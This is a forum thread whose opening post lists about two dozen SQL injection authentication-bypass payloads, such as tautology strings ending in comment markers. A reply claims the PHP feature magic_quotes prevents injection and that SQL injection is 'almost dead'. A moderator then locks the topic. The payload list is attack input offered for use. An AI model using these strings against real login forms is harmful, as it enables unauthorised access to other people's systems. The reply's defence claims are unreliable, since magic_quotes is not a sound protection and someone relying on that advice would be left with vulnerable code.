Jump to content

Recommended Posts

Posted

Some more Sql injections:

 

admin'--

 

' or 0=0 --

 

" or 0=0 --

 

or 0=0 --

 

' or 0=0 #

 

" or 0=0 #

 

or 0=0 #

 

' or 'x'='x

 

" or "x"="x

 

') or ('x'='x

 

' or 1=1--

 

" or 1=1--

 

or 1=1--

 

' or a=a--

 

" or "a"="a

 

') or ('a'='a

 

") or ("a"="a

 

hi" or "a"="a

 

hi" or 1=1 --

 

hi' or 1=1 --

 

hi' or 'a'='a

 

hi') or ('a'='a

 

hi") or ("a"="a

 

Thnx for the topic.  :D

 

Most senseless posting I ever have seen! It's just

 

' or anything=anything--

 

anything must equal anything - that's ALL, you don't post an totally new way to use SQL injections by giving tons of examples!

 

All in all there are just two ways to use SQL injections:

* using another "equal"-statement (like ' or bla=bla--)

* using the UNION-function which combines two SQL-commands

 

In PHP there are some simple functions to prevent using more than one equal statements like the "magic_quotes". UNION can be detected easily, too.

 

How ever SQL injection is almost dead, because every good PHP-scripter knows how to prevent it!

  • 1 month later...
Posted (edited)
On 7/12/2007 at 2:27 PM, Banana Joe said:

what is this?

 

Banana Joe, this is a PURE old thread

 

unfortunatelly , here isn't allowed.

 

1st warn forf you.

 

also..

 

*topic Locked*

Edited by Vision
Guest
This topic is now closed to further replies.


×
×
  • Create New...